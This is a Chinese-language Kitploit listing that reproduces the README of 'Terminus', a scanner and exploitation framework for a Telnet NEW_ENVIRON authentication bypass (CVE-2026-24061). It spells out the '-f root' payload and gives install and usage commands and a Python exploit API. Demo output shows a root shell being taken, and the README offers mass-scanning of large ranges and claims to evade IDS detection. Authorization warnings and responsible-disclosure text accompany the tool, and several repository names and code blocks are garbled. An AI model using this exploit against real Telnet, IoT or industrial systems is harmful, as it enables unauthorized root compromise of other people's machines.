Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Terrminus-CVE-2026-2406 — AsyncIO 扫描器与利用框架,针对 CVE-2026-24061(Telnet NEW_ENVIRON 认证绕过)。具备高并发发现、被动指纹识别以及授权 root shell 提权功能。 | Kitploit
工具/GitHubGitHub/ridpath/terrminus-cve-2026-2406
权限提升侦察漏洞扫描器物联网安全漏洞利用SCADA/ICS安全信息收集Web安全网络安全渗透测试红队
GitHub
287个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
ridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIO 扫描器与利用框架,针对 CVE-2026-24061(Telnet NEW_ENVIRON 认证绕过)。具备高并发发现、被动指纹识别以及授权 root shell 提权功能。

查看仓库

Terminus - CVE-2026-24061 扫描器与利用框架

针对 CVE-2026-24061 Telnet NEW_ENVIRON 认证绕过和权限提升漏洞的安全分析引擎。

Terminus


概述

Terminus 是一款专业安全研究工具,专为 CVE-2026-24061 的授权渗透测试和漏洞评估而设计。该严重漏洞影响遗留 Telnet 守护进程实现,允许未认证的远程攻击者绕过认证并获得 root 级访问权限。

什么是 CVE-2026-24061?

CVE-2026-24061 是支持 RFC 1572(Telnet 环境选项)的 Telnet 服务中的远程代码执行漏洞。该漏洞利用 NEW_ENVIRON 子协商期间对 USER 环境变量消毒不当的问题:

  • 正常认证: USER=john → 提示输入密码
  • 利用载荷: USER=-f root → 绕过认证,授予 root shell

影响:

  • 完全认证绕过(无需密码)
  • 立即提升至 root 权限
  • 完全系统沦陷

受影响服务:

  • 遗留 Telnet GNU Inetutils telnetd(特别是 2.7 及更早版本)
  • 具有易受攻击 Telnet 实现的 IoT 固件
  • 使用过时 Telnet 服务的工业控制系统

主要功能

大规模漏洞扫描器

  • 高并发扫描: 使用 AsyncIO 并发扫描 1,000+ 目标
  • CIDR 支持: 扫描整个网络范围(192.168.0.0/24、10.0.0.0/8)
  • 双重检测模式:
    • 被动(默认):快速、安全、基于签名的检测
    • 主动验证(--verify):利用验证,确认 uid=0 root 访问
  • 横幅分析: 识别守护进程类型和版本
  • 风险评分: 多层置信度评估(CRITICAL、HIGH、MEDIUM、LOW)

RFC 合规协议引擎

  • TerminusNegotiator 类: 用于 Telnet 协议操作的简洁 API
    • Terminus.handshake() - RFC 854 合规握手
    • Terminus.exploit() - CVE-2026-24061 载荷投递
  • 正确的选项协商: 通过协议合规避免 IDS/IPS 检测
  • 状态机: 稳健处理 IAC 序列(DO/DONT/WILL/WONT/SB/SE)

授权门控利用

  • 交互式 Shell: 具有 root 访问权限的完整利用后 shell
  • 命令执行: 执行单个命令并捕获输出
  • 证据收集: 收集 uid、环境变量、系统信息
  • 安全机制:
    • 需要显式 --exploit 标志
    • 在批量扫描模式下禁用
    • 所有利用尝试的审计日志

多格式报告

  • 终端: 带颜色编码风险级别的富格式表格
  • JSON: SIEM/SOAR 集成
  • CSV: 电子表格跟踪
  • HTML: 带统计信息的详细报告
  • Markdown: 适合文档化的输出

架构

核心引擎:TerminusNegotiator

Terminus 的核心是 TerminusNegotiator 类,它在协议处理和利用逻辑之间提供了清晰的分离:```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

root@kitploit:~
### 引擎 vs. 脚本方法

**传统脚本**(现有工具):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

Terminus 引擎:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

root@kitploit:~
---

## 安装

### 环境要求
- **Python 3.10+**
- **支持的平台:**
  - Windows 10/11(PowerShell)
  - Windows + WSL2(Kali Linux、Parrot OS、Ubuntu)
  - 原生 Linux(Kali、Parrot、Ubuntu、Debian)
  - macOS(需 Python 3.10+)

### 快速开始(所有平台)

#### Windows(PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS(Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

root@kitploit:~
#### 手动安装(所有平台)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

依赖(跨平台)

  • telnetlib3 - AsyncIO Telnet 协议实现
  • rich - 终端界面与格式化(支持 Windows/Linux 上的 ANSI)
  • pydantic - 数据验证与模型
  • aiofiles - 异步文件 I/O
  • jinja2 - 报告模板生成
  • pyyaml - 配置管理
  • pathlib - 跨平台路径处理(内置)

注意: 所有依赖均为纯 Python 或提供跨平台 wheel 包,无需平台特定的编译。


Shell 补全(可选)

启用 Tab 补全以加快命令输入:

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

root@kitploit:~
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

Fish```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

root@kitploit:~
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

测试一下:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

root@kitploit:~
---

## 使用方法

### 扫描模式

#### 单目标扫描```bash
terminus scan -t 192.168.1.100

CIDR 范围扫描```bash

terminus scan -t 192.168.1.0/24

root@kitploit:~
#### 基于文件的批量扫描```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

高并发网络扫描```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

root@kitploit:~
### 检测模式

#### 被动检测(默认 - 安全)```bash
terminus scan -t target.com --passive-only

激进检测(全部启发式)```bash

terminus scan -t target.com --aggressive

root@kitploit:~
#### 主动验证模式(漏洞利用证明)```bash
terminus scan -t 192.168.1.100 --verify

使用方法

现场演示

检查版本:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

root@kitploit:~
**被动扫描(默认 - 保守风险评估):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Parsing 1 targets...
Found 1 valid targets

  Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00

╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│   Critical: 0            │
│   High: 0                │
│   Medium: 0              │
│   Low: 1                 │
│   Info: 0                │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯

                                 Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │  Status   │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │     YES     │    -     │       3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

No vulnerable targets found

使用 --verify 进行主动验证(漏洞利用证明):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify

================================================================ TERMINUS CVE-2026-24061 Scanner & Exploitation Framework

Parsing 1 targets... Found 1 valid targets

Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00

╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯

root@kitploit:~
                               Terminus - CVE-2026-24061 Scan Results

╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

Found 1 vulnerable targets!

root@kitploit:~
**交互式利用:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Attempting exploitation of 172.17.45.122:2323...
Payload: -f root

CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained

[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit

whoami
root
┌──[root@parrot]─[~]
└──╼ #

关键观察:

  • 被动模式:检测到 NEW_ENVIRON 支持,但报告为低风险(保守评估)
  • 主动验证:确认 root 访问权限(uid=0),风险升级为严重,验证状态为“ROOT”
  • 利用:无需密码提示即可直接获取 root shell

功能说明:

  • 首先执行被动检测(横幅 + 协议分析)
  • 若怀疑存在漏洞,则使用 -f root 载荷尝试实际利用
  • 通过检查响应中的 uid=0 确认 root 访问权限
  • 确认 root 访问权限后将风险升级为严重
  • 在扫描结果中输出验证状态

使用场景:

  • 合规报告的高置信度验证
  • 概念验证演示
  • 在向厂商报告前确认可利用性
  • 需要证据收集的红队行动

示例输出:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A

root@kitploit:~
**批量验证:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json

注意: 主动验证会尝试利用漏洞。仅在获得适当授权的情况下使用。

输出格式

JSON 输出```bash

terminus scan -t 192.168.1.0/24 -o json > results.json

root@kitploit:~
#### HTML 报告```bash
terminus scan -f targets.txt -o html -w report.html

CSV 导出```bash

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv

root@kitploit:~
### 利用(仅限授权使用)

#### 交互式 Shell```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

命令执行```bash

terminus exploit -t 192.168.1.100 -c "id"

Output: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
#### 自定义载荷```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"

实用命令

更新漏洞签名```bash

terminus update-signatures

root@kitploit:~
#### 验证先前结果```bash
terminus verify -f results.json

显示版本与签名```bash

terminus version

root@kitploit:~
---

## 测试环境搭建

### 针对红队:跨平台部署

**Terminus 专为便携式部署而设计** —— 将目录复制到任意 Windows/Linux 系统即可直接运行,无需安装:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml

WSL2 测试环境(Windows)

推荐用于 Windows 红队工作站 - 用于部署易受攻击测试服务的隔离 Linux 环境:

安装带 Kali 或 Parrot 的 WSL2```powershell

Windows PowerShell (Admin)

Install WSL2

wsl --install

Install Kali Linux

wsl --install -d kali-linux

OR Install Parrot OS (if available)

wsl --install -d ParrotOS

Verify

wsl -l -v

root@kitploit:~
#### 在 WSL2 内部(Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate

部署易受攻击的测试服务(仅限 WSL2)

警告:仅在隔离的实验环境中使用。切勿在生产系统上使用。```bash

Inside WSL2

Install vulnerable netkit-telnetd version

sudo apt install netkit-telnetd=0.17-*

Configure for NEW_ENVIRON support

Edit /etc/inetd.conf to enable telnet

Start service

sudo systemctl restart inetd

Test from Windows host

From PowerShell:

terminus scan -t $(wsl hostname -I)

root@kitploit:~
### 跨平台测试矩阵

在红队使用的所有平台上测试 Terminus:

| 平台 | 安装 | 扫描 | 漏洞利用 |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | 是 | 是 | 是 |
| WSL2 - Kali Linux | 是 | 是 | 是 |
| WSL2 - Parrot OS | 是 | 是 | 是 |
| WSL2 - Ubuntu | 是 | 是 | 是 |
| 原生 Kali Linux | 是 | 是 | 是 |
| 原生 Parrot OS | 是 | 是 | 是 |
| macOS | 是 | 是 | 是 |

---

## API 参考

### Python 集成```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore

async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f"   Daemon: {result.daemon_type} {result.version}")
                print(f"   Confidence: {result.vulnerability_confidence:.2%}")

async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()
    
    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return
    
    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print(f"Root access obtained")
        print(f"Evidence: {result.evidence}")

# Run
asyncio.run(scan_network())

安全与道德

法律警告

本工具仅适用于:

  • 经授权的渗透测试项目
  • 受控环境中的安全研究
  • CTF 竞赛与教学实验环境
  • 经书面许可的防御性安全评估

未经授权的使用属于违法行为,且不符合道德规范。

安全机制

  1. 需要授权: 利用功能必须显式使用 --exploit 标志
  2. 确认提示: 利用前需进行交互式确认
  3. 审计日志: 所有利用尝试均记录时间戳
  4. 单目标强制: 批量扫描模式下禁用利用功能
  5. 速率限制: 防止扫描过程中意外造成 DoS

负责任披露

如果您使用 Terminus 发现易受攻击的系统:

  1. 请勿在未经书面授权的情况下利用系统
  2. 通过负责任披露流程向系统所有者报告发现
  3. 使用 Terminus 的报告功能记录发现
  4. 遵循协调漏洞披露指南

参考资料

CVE 信息

  • CVE ID: CVE-2026-24061
  • 严重程度: 严重(CVSS 9.8)
  • 攻击向量: 网络、未认证、低复杂度

研究与实现

  • 主要研究: SafeBreach-Labs CVE-2026-24061
  • 参考利用: telnet_rce.py
  • 批量扫描器: TryA9ain CVE-2026-24061

协议标准

  • RFC 854: Telnet 协议规范
  • RFC 1572: Telnet 环境选项

测试与验证

测试覆盖率

  • 使用 pytest 实现 90% 以上的代码覆盖率
  • 所有核心模块的单元测试
  • 使用模拟 Telnet 服务器进行集成测试
  • 性能基准测试(1,000 个目标 < 60 秒)

手动测试清单

  • 扫描易受攻击的服务(验证检测能力)
  • 扫描已修补的服务(验证无误报)
  • 测试认证绕过(无密码提示)
  • 验证权限提升(uid=0)
  • 监控 IDS 警报(验证隐蔽性)
  • 性能测试(1,000 个以上目标)

配置

config.yaml(跨平台)

所有路径均相对于项目根目录——无需修改即可在 Windows、Linux 和 WSL 上运行:```yaml

config.yaml - Cross-platform configuration

All paths relative to project directory

scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second

detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true

Signature database (relative path)

signatures_db: "./signatures.db"

exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true

reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"

Output directory (relative path - works on Windows/Linux)

output_dir: "./reports"

logging: level: "INFO"

Log file (relative path - automatic directory creation)

file: "./logs/terminus.log" format: "json" console_enabled: true


Acknowledgments

  • SafeBreach Labs: Original CVE-2026-24061 research and exploit implementation
  • TryA9ain: Batch scanning approach inspiration
  • RFC Authors: Telnet protocol specifications

下载工具